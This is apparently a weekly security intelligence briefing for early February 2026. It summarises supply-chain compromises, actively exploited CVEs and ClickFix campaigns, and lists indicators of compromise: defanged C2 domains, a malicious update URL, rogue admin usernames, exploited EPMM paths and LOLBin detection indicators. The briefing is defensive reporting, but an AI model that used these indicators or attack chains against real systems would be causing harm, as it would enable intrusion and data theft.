Table of Contents
Weekly Security Intelligence Briefing
Classification: Public
Reporting Period: January 26 – February 2, 2026
Distribution: Security Operations, IT Leadership, Executive Team
Prepared By: Tech Jacks Solutions Security Intelligence
TJS Weekly Security Intelligence Briefing – Week of Feb 2nd 2026
1. Executive Summary
The week of January 26 – February 2, 2026 presents a critical risk posture driven by multiple nation-state supply chain attacks, widespread exploitation of ubiquitous software, and zero-day vulnerabilities across enterprise infrastructure. Chinese state-sponsored actors compromised Notepad++ update infrastructure for six months (June–December 2025), delivering the Chrysalis backdoor to telecommunications and financial sector targets across Asia-Pacific. Russian APTs (Sandworm, Turla, TEMP.Armageddon) continue exploiting WinRAR CVE-2025-8088 through January 2026 to target Ukrainian military and government entities.
The MaliciousCorgi campaign exposed 1.5 million developers to credential theft through trojanized VS Code extensions that remain live on Microsoft’s marketplace. Ivanti disclosed CVE-2026-1281/CVE-2026-1340 (CVSS 9.8) with public PoC and active exploitation within 24 hours. Microsoft issued emergency patches for CVE-2026-21509 after APT28 weaponized it against Ukraine and EU institutions. Fortinet confirmed CVE-2026-24858 (CVSS 9.4) affecting 3.2M+ exposed devices. ClickFix attacks now abuse signed Microsoft App-V scripts to deliver infostealers.
Key Statistics:
- 1.5M+ developers exposed via MaliciousCorgi VS Code extensions (still live)
- 6-month Notepad++ supply chain compromise (China/Lotus Blossom)
- 4+ Russian APT groups exploiting WinRAR CVE-2025-8088 through January 2026
- 3.2M+ Fortinet devices exposed to CVE-2026-24858
- 31.4 Tbps record DDoS attack (Aisuru botnet)
- 900K+ Chrome users exposed to conversation-stealing extensions
2. Critical Action Items
| Priority | Item | Affected Product | Deadline | Action |
|---|---|---|---|---|
| 1 | Notepad++ Supply Chain – Chinese APT Compromised Update Infrastructure | Notepad++ < 8.9.1 | Immediate | Update to 8.9.1+ manually; rotate credentials; assume compromise if auto-updated Jun–Dec 2025 |
| 2 | CVE-2025-8088 – WinRAR Path Traversal (Multi-APT Exploitation) | WinRAR < 7.13 | Immediate | Update to 7.13 manually (no auto-update); block RAR files with ADS |
| 3 | MaliciousCorgi – Trojanized VS Code Extensions (1.5M Installs) | VS Code Extensions | Immediate | Remove chatgpt-china and chat-moss; rotate ALL developer credentials |
| 4 | CVE-2026-1281/1340 – Ivanti EPMM RCE Zero-Days (PoC Available) | Ivanti EPMM 12.x | Feb 1, 2026 (CISA KEV) | Apply RPM patches; assume compromise if internet-exposed |
| 5 | CVE-2026-24858 – FortiCloud SSO Auth Bypass (Active Exploitation) | FortiOS 7.x | Jan 30, 2026 (CISA KEV) | Upgrade to 7.6.6/7.4.11; disable FortiCloud SSO |
| 6 | CVE-2026-21509 – Microsoft Office Zero-Day (APT28 Weaponized) | Office 2016/2019/2021/365 | Feb 16, 2026 (CISA KEV) | Apply OOB updates; block RTF attachments |
| 7 | Chrome AI Extensions – ChatGPT/DeepSeek Conversation Theft | Chrome Extensions | Immediate | Remove suspicious AI extensions; audit installed extensions |
3. Key Security Stories
Story 1: Notepad++ Supply Chain Attack – Chinese APT Delivered Chrysalis Backdoor for 6 Months
On February 2, 2026, Notepad++ maintainer Don Ho disclosed that Chinese state-sponsored actors compromised the application’s hosting provider infrastructure from June through December 2025, selectively redirecting update traffic to deliver malware. Rapid7 attributed the campaign with medium-high confidence to Lotus Blossom (also tracked as Billbug/Spring Dragon), a Chinese APT active since 2009 targeting government, telecommunications, and critical infrastructure.
The Chrysalis backdoor supports 16 command capabilities including interactive shell access, file operations, and self-removal. Kaspersky identified three distinct infection chains with attackers rotating C2 servers and payloads monthly. Targets included organizations in Vietnam, Philippines, El Salvador, and Australia, primarily in telecommunications and financial services. The attack exploited insufficient signature verification in WinGUP, the Notepad++ updater component.
Affected Versions: All Notepad++ versions that auto-updated between June–December 2025
Attribution: Lotus Blossom/Billbug/Spring Dragon (China) – medium-high confidence
Current Status: Fixed in 8.8.9 (December 2025); version 8.9.2 will enforce signature validation
Remediation: Update to 8.9.1 via manual download from official site; rotate all credentials accessible from affected workstations; scan for Chrysalis IOCs
Source: TechCrunch, SecurityWeek, The Hacker News, Rapid7 Analysis
Story 2: WinRAR CVE-2025-8088 – Four Nation-State Groups Exploiting Path Traversal Through January 2026
Google Threat Intelligence Group reported on January 28 that Russian and Chinese APTs continue exploiting CVE-2025-8088 (CVSS 8.4), a WinRAR path traversal vulnerability patched in July 2025. The flaw allows malicious RAR archives to write files to arbitrary locations, including the Windows Startup folder, using NTFS Alternate Data Streams (ADS).
Active exploitation by at least four nation-state groups: APT44/Sandworm delivers NESTPACKER loader; Turla (Summit) deploys STOCKSTAY; TEMP.Armageddon (Carpathian) targets Ukrainian entities; and a China-linked APT delivers PoisonIvy RAT. The exploit was sold by threat actor “zeroplayer” for $80,000 on underground forums in July 2025 before public disclosure. Google TAG observed continued exploitation through late January 2026 targeting Ukrainian military, Indonesian organizations, and Latin American hospitality sector.
Affected Versions: WinRAR prior to 7.13 (patched July 30, 2025)
Exploitation Status: Active by 4+ nation-state groups; CISA KEV listed
Remediation: Update to WinRAR 7.13 manually (no auto-update mechanism); consider blocking RAR attachments with ADS at email gateway
Source: Google Cloud Blog, SecurityWeek, BleepingComputer
Story 3: MaliciousCorgi – 1.5 Million Developers Exposed via Trojanized VS Code Extensions
Koi Security disclosed on January 22 that two VS Code extensions with 1.5 million combined installations contain identical spyware exfiltrating developer data to servers in China. The extensions “ChatGPT – 中文版” (1.34M installs, publisher: WhenSunset) and “ChatMoss/CodeMoss” (150K installs, publisher: zhukunpeng) remained live on Microsoft’s VS Code Marketplace as of February 2, 2026, despite disclosure.
The malware operates through three channels: real-time file monitoring capturing every opened file, remote-triggered file harvesting of up to 50 workspace files on command, and hidden analytics SDKs (Zhuge.io, GrowingIO, TalkingData, Baidu Analytics). All file contents are Base64-encoded and transmitted to aihao123[.]cn. The extensions function as legitimate AI coding assistants, avoiding suspicion while continuously exfiltrating source code, API keys, .env files, and SSH keys.
Affected Products: VS Code extensions whensunset.chatgpt-china, zhukunpeng.chat-moss
Exploitation Status: Active; extensions still available on Marketplace as of Feb 2
Remediation: Remove extensions immediately; rotate ALL credentials (API keys, NPM tokens, GitHub tokens, SSH keys); audit .env files and credential stores for exposure
Source: Koi Security Research, BleepingComputer, The Hacker News
Story 4: Ivanti EPMM Zero-Days Under Active Exploitation (CVE-2026-1281, CVE-2026-1340)
On January 29, 2026, Ivanti disclosed two critical code injection vulnerabilities in Endpoint Manager Mobile (EPMM) that allow unauthenticated remote code execution. Both CVE-2026-1281 and CVE-2026-1340 carry CVSS 9.8 ratings. CVE-2026-1281 was immediately added to CISA’s KEV catalog with an unusually short remediation deadline of February 1 (three days), signaling the severity of ongoing exploitation.
WatchTowr researchers published technical analysis and proof-of-concept code on January 30. Shadowserver observed exploitation attempts from at least 13 source IPs within 24 hours of disclosure, with approximately 1,600 EPMM instances exposed globally. Attackers are installing web shells and establishing reverse shells, targeting endpoints at /mifs/c/aftstore/fob/ and /mifs/c/appstore/fob/.
Affected Versions: EPMM 12.5.x, 12.6.x, 12.7.x (on-premises only; cloud MDM not affected)
Exploitation Status: Actively exploited; public PoC available
Remediation: Apply RPM 12.x.0.x or 12.x.1.x patches; assume compromise and initiate IR if exposed
Source: Rapid7 Blog, Ivanti Advisory, CISA KEV
Story 5: ClickFix Attacks Expand with Microsoft App-V Script Abuse
BlackPoint Cyber reported on January 26 that ClickFix social engineering campaigns now abuse signed Microsoft Application Virtualization (App-V) scripts as living-off-the-land binaries (LOLBins). Fake CAPTCHA pages trick users into pasting malicious commands into the Windows Run dialog, proxying PowerShell execution through trusted Microsoft components to deliver the Amatera infostealer.
Microsoft reports ClickFix techniques accounted for 47% of observed attacks in recent months. The campaigns target social media creators with fake “verification badge” and “account suspension” lures. The ErrTraffic traffic distribution system launched specifically to support ClickFix operations. ClickFix builders are advertised on hacker forums for $200–$1,500/month.
Attack Vector: Fake CAPTCHA → clipboard hijack → Windows Run dialog → SyncAppvPublishingServer.vbs execution
Variants: JackFix, CrashFix
Remediation: Restrict Windows Run dialog via GPO where feasible; remove App-V components if unused; enable PowerShell Script Block Logging; train users on clipboard-based attacks
Source: BleepingComputer, The Hacker News, Microsoft Security Blog
Story 6: Chrome Extensions Stealing ChatGPT and DeepSeek Conversations
OX Security disclosed in late January that malicious Chrome extensions are harvesting complete conversation histories from ChatGPT and DeepSeek AI platforms. The extensions “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” (600K users) and “AI Sidebar with Deepseek, ChatGPT, Claude” (300K users) exfiltrate all AI conversations and browsed URLs to C2 servers every 30 minutes.
The malicious extensions impersonate the legitimate “Chat with all AI models” extension from AITOPIA (1M users). Secure Annex researchers dubbed this “Prompt Poaching” technique. Related discovery: Urban VPN Proxy extension caught performing identical exfiltration. Extensions remained on Chrome Web Store at time of disclosure.
Affected Products: Chrome browser with malicious AI assistant extensions
Data Exfiltrated: Complete ChatGPT/DeepSeek conversations, all browsed URLs
Remediation: Audit installed Chrome extensions; remove suspicious AI extensions; review browser extension permissions; consider enterprise extension allowlisting
Source: OX Security Research, BleepingComputer, Secure Annex
Story 7: APT28 Weaponizes Microsoft Office Zero-Day Against Ukraine and EU
Microsoft issued an emergency out-of-band patch on January 26 for CVE-2026-21509 (CVSS 7.8), an actively exploited security feature bypass in Microsoft Office. By January 29, Zscaler confirmed APT28 (Fancy Bear) was exploiting the vulnerability in phishing campaigns targeting Ukrainian government entities and EU institutions, delivering the MiniDoor backdoor via weaponized RTF files with C2 communications routed through FileCloud storage API.
Affected Versions: Office 2016, 2019, LTSC 2021, LTSC 2024, Microsoft 365 Apps
Exploitation Status: Actively exploited by APT28; no public PoC
Remediation: Apply OOB updates; block RTF attachments at email gateway
Source: Microsoft Advisory, Help Net Security, CISA KEV
Story 8: Fortinet FortiCloud SSO Zero-Day Enables Cross-Account Access (CVE-2026-24858)
Fortinet confirmed CVE-2026-24858 (CVSS 9.4) on January 27, revealing that attackers with a FortiCloud account could authenticate to devices registered under other customer accounts. Arctic Wolf first observed automated attacks creating rogue admin accounts on January 15. Censys identified over 3.2 million Fortinet devices with exposed web interfaces.
Affected Versions: FortiOS 7.0.x–7.6.5, FortiManager 7.0.x–7.6.5, FortiAnalyzer 7.0.x–7.6.5
Exploitation Status: Actively exploited; CISA KEV deadline Jan 30
Remediation: Upgrade to FortiOS 7.6.6, 7.4.11, 7.2.13, or 7.0.19; disable FortiCloud SSO if unable to patch
Source: Fortinet PSIRT FG-IR-26-060, CISA Alert
Story 9: Sandworm Targets Polish Energy Infrastructure with DynoWiper
CERT Polska disclosed coordinated attacks on December 29, 2025 targeting over 30 wind farms, solar installations, and a CHP plant serving 500,000 customers. ESET attributed the attacks with medium confidence to Sandworm (APT44/ELECTRUM). The DynoWiper malware overwrites files using Mersenne Twister PRNG. Entry occurred through compromised RTUs using default credentials.
Attribution: Sandworm/ELECTRUM/APT44 (Russia-linked) – medium confidence
Impact: Communication disruption; no physical power outages
Source: Dragos Blog, Polish Government
4. CISA KEV & Critical CVE Table
| CVE | Product | CVSS | Status | CISA Deadline | Description |
|---|---|---|---|---|---|
| CVE-2026-1281 | Ivanti EPMM | 9.8 | Actively Exploited | Feb 1, 2026 | Unauthenticated RCE via code injection |
| CVE-2026-24858 | Fortinet FortiOS | 9.4 | Actively Exploited | Jan 30, 2026 | FortiCloud SSO authentication bypass |
| CVE-2025-8088 | WinRAR | 8.4 | Actively Exploited | CISA KEV Listed | Path traversal via ADS; multi-APT exploitation |
| CVE-2026-21509 | Microsoft Office | 7.8 | Actively Exploited | Feb 16, 2026 | OLE mitigation bypass (APT28 weaponized) |
| CVE-2026-24061 | GNU InetUtils | 8.7 | Actively Exploited | Feb 16, 2026 | Telnetd authentication bypass |
| CVE-2026-1340 | Ivanti EPMM | 9.8 | PoC Available | N/A | Unauthenticated RCE (companion to 1281) |
| CVE-2026-23550 | WordPress Modular DS | 10.0 | Actively Exploited | Pending | Unauthenticated privilege escalation |
| CVE-2026-1470 | n8n Workflow | 9.9 | PoC Available | N/A | Eval injection sandbox bypass |
| N/A | Notepad++ | High | Supply Chain | N/A | 6-month hosting compromise (Lotus Blossom) |
| N/A | VS Code Extensions | High | Active | N/A | MaliciousCorgi credential theft (1.5M users) |
| N/A | Chrome Extensions | High | Active | N/A | AI conversation theft (900K+ users) |
5. Supply Chain & Developer Tool Threats
Active Campaigns This Week
| Campaign | Target | Scale | Status |
|---|---|---|---|
| Notepad++ (Lotus Blossom) | Developers, enterprises | 6-month compromise | Fixed in 8.9.1 |
| MaliciousCorgi | VS Code developers | 1.5M installs | Extensions still live |
| GlassWorm (Open VSX) | VS Code developers | 35,800+ installs | Removed; C2 active |
| Chrome AI Extensions | ChatGPT/DeepSeek users | 900K+ users | Extensions still live |
| PackageGate | npm/pnpm/Bun users | Ecosystem-wide | Vulnerabilities disclosed |
Developer Environment Hardening Priorities
- Audit all IDE extensions – Remove any extension not explicitly required
- Verify update sources – Download updates from official sources only; verify signatures
- Credential rotation – If any supply chain exposure possible, rotate all tokens/keys
- Extension allowlisting – Implement enterprise policies restricting extension installation
6. Phishing & Social Engineering Alert
ClickFix Campaign Surge
Microsoft Threat Intelligence reports ClickFix techniques accounted for 47% of observed phishing attacks. The attack flow: fake CAPTCHA → malicious script copied to clipboard → user pastes into Windows Run dialog → LOLBin execution.
Detection Indicators:
- Unexpected
SyncAppvPublishingServer.vbsexecution - PowerShell spawned from mshta.exe or wscript.exe
- Clipboard manipulation via JavaScript
Mitigation:
- Disable Windows Run dialog via Group Policy where feasible
- Enable PowerShell Script Block Logging
- Deploy browser isolation for untrusted sites
- User awareness training on clipboard-based attacks
7. Indicators of Compromise
Notepad++ / Chrysalis Backdoor
C2 Domains:
- api.skycloudcenter[.]com
- api.wiresguard[.]com
Malicious Update Source (historical):
- 45.76.155[.]202/update/update.exe
File Indicators:
- BluetoothService.exe (renamed Bitdefender loader)
- log.dll (malicious sideloaded DLL)
Behavioral:
- DLL sideloading via renamed AV executable
- Microsoft Warbird API abuse for obfuscation
WinRAR CVE-2025-8088 Campaign
Malware Families:
- NESTPACKER (APT44/Sandworm)
- STOCKSTAY (Turla)
- PoisonIvy (China-linked APT)
- XWorm, AsyncRAT, Lumma Stealer (cybercrime)
TTPs:
- RAR archives with NTFS Alternate Data Streams
- Files written to: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
- Geopolitical lures: Ukraine conflict, Indonesian government
MaliciousCorgi VS Code Extensions
Extension IDs (REMOVE IMMEDIATELY):
- whensunset.chatgpt-china
- zhukunpeng.chat-moss
Exfiltration Server:
- aihao123[.]cn
Analytics SDKs (hidden iframes):
- Zhuge.io, GrowingIO, TalkingData, Baidu Analytics
Behavioral:
- Base64-encoded file contents transmitted
- Up to 50 workspace files harvested on command
Fortinet CVE-2026-24858
Rogue Admin Usernames:
- audit, backup, itadmin, secadmin, support
- backupadmin, deploy, remoteadmin, security, sv
APT28 CVE-2026-21509 Campaign
Malware: MiniDoor backdoor
C2: FileCloud (filen.io) API
Document Lures:
- "Consultation_Topics_Ukraine(Final).doc"
- Ukrainian weather bulletins
- EU consultation documents
GlassWorm Supply Chain
C2 Infrastructure:
- Solana RPC endpoints (various)
- Google Calendar API (backup C2)
Compromised Extensions (oorzc namespace):
- oorzc.ssh-tools
Behavioral:
- Solana blockchain transaction memos for C2
- macOS Keychain access attempts
- FortiClient VPN config theft
8. Helpful 5: High-Value, Low-Effort Mitigations
1. Developer Environments: Emergency Extension Audit
Why: MaliciousCorgi (1.5M users) and GlassWorm (35K+ users) actively stealing credentials; extensions remain live
How:
- Search VS Code:
@installed whensunsetand@installed zhukunpengand@installed oorzc - Remove immediately if found
- Rotate ALL credentials: API keys, NPM/GitHub tokens, SSH keys, database passwords
- Review
~/.ssh/,.envfiles, and credential stores for exposure - Implement extension allowlisting policy
Framework Alignment: CIS Control 2.7, NIST CSF PR.DS-6, ISO 27001 A.14.2.5
2. Notepad++: Manual Update and Compromise Assessment
Why: 6-month supply chain compromise affecting unknown number of organizations
How:
- Check current version: Help → About (vulnerable if < 8.8.9)
- Download 8.9.1 directly from notepad-plus-plus.org (verify signature)
- If auto-updated between June–December 2025, assume potential compromise
- Scan for Chrysalis IOCs (BluetoothService.exe, log.dll, C2 domains)
- Rotate credentials accessible from affected workstations
Framework Alignment: CIS Control 2.3, NIST CSF PR.IP-12, ISO 27001 A.12.6.1
3. WinRAR: Update and Email Gateway Controls
Why: 4+ nation-state groups actively exploiting; no auto-update mechanism
How:
- Download WinRAR 7.13 from rarlab.com (verify hash)
- Deploy via SCCM/Intune to all endpoints
- Configure email gateway to quarantine RAR files with ADS
- Enable file type blocking for .rar attachments from external senders
- User awareness: Ukraine/military themed phishing
Framework Alignment: CIS Control 9.5, NIST CSF PR.AT-1, MITRE ATT&CK T1566.001
4. ClickFix Defense: PowerShell and Run Dialog Restrictions
Why: 47% of observed attacks use ClickFix; abuses legitimate Windows components
How:
- GPO: Disable Windows Run dialog for standard users (HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun)
- Remove App-V components if not in use:
Get-AppxPackage *appv* | Remove-AppxPackage - Enable PowerShell Script Block Logging (Event ID 4104)
- Monitor for: mshta.exe, wscript.exe, SyncAppvPublishingServer.vbs
Framework Alignment: CIS Control 4.8, NIST CSF PR.PT-3, MITRE ATT&CK T1059.001
5. Ivanti EPMM: Emergency Patching and IOC Hunt
Why: PoC public; exploitation within 24 hours; 3-day CISA deadline
How:
- Apply RPM patches immediately
- Check Apache logs for:
/mifs/c/aftstore/fob/,/mifs/c/appstore/fob/ - Hunt for web shells in EPMM directories
- Monitor for reverse shell connections
- If internet-exposed without patch, initiate incident response
Framework Alignment: CIS Control 7.1, NIST CSF DE.CM-8, CISA BOD 22-01
9. Framework Alignment Matrix
| Vulnerability/Threat | CIS Controls v8 | NIST CSF 2.0 | ISO 27001:2022 | MITRE ATT&CK | CISA Guidance |
|---|---|---|---|---|---|
| Notepad++ Supply Chain | 2.3, 2.7, 7.1 | PR.DS-6, PR.IP-12 | A.14.2.5, A.12.6.1 | T1195.002, T1059 | Supply Chain Risk |
| WinRAR CVE-2025-8088 | 9.5, 7.1, 14.3 | PR.AT-1, PR.IP-12 | A.7.2.2, A.12.6.1 | T1566.001, T1547.001 | KEV Catalog |
| MaliciousCorgi Extensions | 2.7, 16.2, 6.5 | PR.DS-6, DE.CM-4 | A.14.2.5 | T1195.002, T1555 | Supply Chain Risk |
| CVE-2026-1281 (Ivanti) | 7.1, 7.3, 12.1 | PR.IP-12, DE.CM-8 | A.12.6.1 | T1190, T1059 | BOD 22-01 |
| CVE-2026-24858 (Fortinet) | 6.3, 6.5, 7.1 | PR.AC-7, PR.IP-12 | A.9.4.2 | T1078 | KEV Catalog |
| CVE-2026-21509 (Office) | 9.5, 14.3 | PR.DS-5, PR.AT-1 | A.13.2.1 | T1566.001 | KEV Catalog |
| ClickFix/App-V Abuse | 4.8, 14.6, 8.2 | PR.PT-3, PR.AT-1 | A.7.2.2 | T1059.001, T1204 | User Awareness |
| Chrome AI Extensions | 2.7, 16.2 | PR.DS-6, DE.CM-4 | A.14.2.5 | T1176, T1555 | Browser Security |
| GlassWorm Supply Chain | 2.7, 16.2 | PR.DS-6, DE.CM-4 | A.14.2.5 | T1195.002 | Supply Chain Risk |
| Poland Energy (Sandworm) | 5.2, 12.8 | PR.AC-1, DE.AE-2 | A.12.4.1 | T1078.001, T1485 | ICS Advisory |
10. Upcoming Security Events
| Date | Event | Action Required |
|---|---|---|
| Feb 1, 2026 | CVE-2026-1281 (Ivanti EPMM) CISA KEV Deadline | Patch or discontinue use |
| Feb 3, 2026 | CVE-2026-20805 (Windows DWM) CISA KEV Deadline | Apply January patches |
| Feb 11, 2026 | February 2026 Patch Tuesday | Plan testing cycle |
| Feb 16, 2026 | CVE-2026-21509 (Office) CISA KEV Deadline | Apply OOB updates |
| Feb 16, 2026 | CVE-2026-24061 (GNU InetUtils) CISA KEV Deadline | Patch telnetd |
| Ongoing | MaliciousCorgi/Chrome Extensions | Monitor for marketplace removal |
11. Sources
Supply Chain & Developer Tool Threats:
- TechCrunch (Notepad++): https://techcrunch.com/2026/02/02/notepad-plus-plus-chinese-government-hackers/
- Rapid7 (Chrysalis Analysis): https://www.rapid7.com/blog/
- Koi Security (MaliciousCorgi): https://www.koi.ai/blog/maliciouscorgi/
- OX Security (Chrome Extensions): https://www.ox.security/blog/
- Socket Security (GlassWorm): https://socket.dev/blog/glassworm-loader-open-vsx/
Nation-State Activity:
- Google Threat Intelligence (WinRAR): https://cloud.google.com/blog/topics/threat-intelligence/winrar-zero-day-exploitation/
- Kaspersky (Notepad++ infection chains): https://www.kaspersky.com/
- Dragos (Poland/Sandworm): https://www.dragos.com/blog/poland-power-grid-attack-electrum/
Vendor Advisories:
- CISA KEV Catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- Ivanti Security Advisory: https://forums.ivanti.com/
- Fortinet PSIRT FG-IR-26-060: https://fortiguard.fortinet.com/psirt/FG-IR-26-060
- Microsoft MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509
Security News:
- BleepingComputer: https://www.bleepingcomputer.com
- The Hacker News: https://thehackernews.com
- SecurityWeek: https://www.securityweek.com
- Help Net Security: https://www.helpnetsecurity.com
Document Version: 1.0
Last Updated: February 3, 2026, 14:00 EST
Next Briefing: February 9, 2026
